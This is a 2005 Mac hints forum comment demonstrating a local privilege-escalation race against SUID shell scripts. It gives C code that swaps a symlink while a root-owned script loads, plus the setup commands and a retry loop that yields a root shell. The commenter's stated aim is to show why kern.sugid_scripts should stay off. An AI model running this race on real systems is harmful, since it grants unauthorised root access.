Submit Hint Search The Forums LinksStatsPollsHeadlinesRSS
14,000 hints and counting!


Click here to return to the 'Run SUID shell scripts safely' hint
The following comments are owned by whoever posted them. This site is not responsible for what they say.
Run SUID shell scripts safely
Authored by: gshenaut on Apr 19, '05 06:53:28PM
Yeah, the key to this as I understand it is that you create a symlink in a directory you own to a suid script somewhere else, and then invoke the symlink while immediately replacing it with your own content. I played around with this a little, and it definitely works, better with long scripts than short ones. It is an artifact of the way #! scripts are implemented, passing the name of the script to the interpreter rather than a file descriptor.

So, relunctantly, I am turning sugid_scripts back off on my machines.

I am a firm believer in sunshine as being the best defense against maliciousness, so in that spirit, here is the code I used in my playing around:


main(){
        if (fork()) {
                execl("/Users/MYNAME/mylink", 0);
        } else {
                unlink ("mylink");
                write (creat("mylink", 0777), "sh\n", 3);
        }
        exit(0);
}
To convince yourself of the wisdom of disallowing suid scripts, do the following: Change the string MYNAME to your login name and compile the above program. Then find a suid script (you will probably have to make one; if you do, it will work much better if you stick a bunch of comment lines in there to make it take a while to load). To make it suid, run the commands "sudo chown 0:0 SCRIPT; sudo chmod +w,+s SCRIPT", where SCRIPT is the path to your script. My test script was simply

#!/bin/sh
# a long comment line, repeated 100 times
...
whoami

You will have to enable suid scripts:


sudo sysctl -w kern.sugid_scripts=1
Now the fun part: run this command over and over again from your home directory:

rm -f mylink ; ln -s SCRIPT mylink ; ./a.out
where SCRIPT is the path to your suid script. When you get a root prompt, stop. On my 1st edition 17" PB, it takes from 2 to over 20 tries to get root, but I have always gotten there.

Note that you don't need write permission on the script at all, just write permission in your home directory. This little demo turned me from a strong advocate of allowing suid scripts to a strong advocate for disallowing them.

Once you're done with this test, don't forget to remove your test script and to run

sudo sysctl -w kern.sugid_scripts=0

Greg Shenaut

[ Reply to This | # ]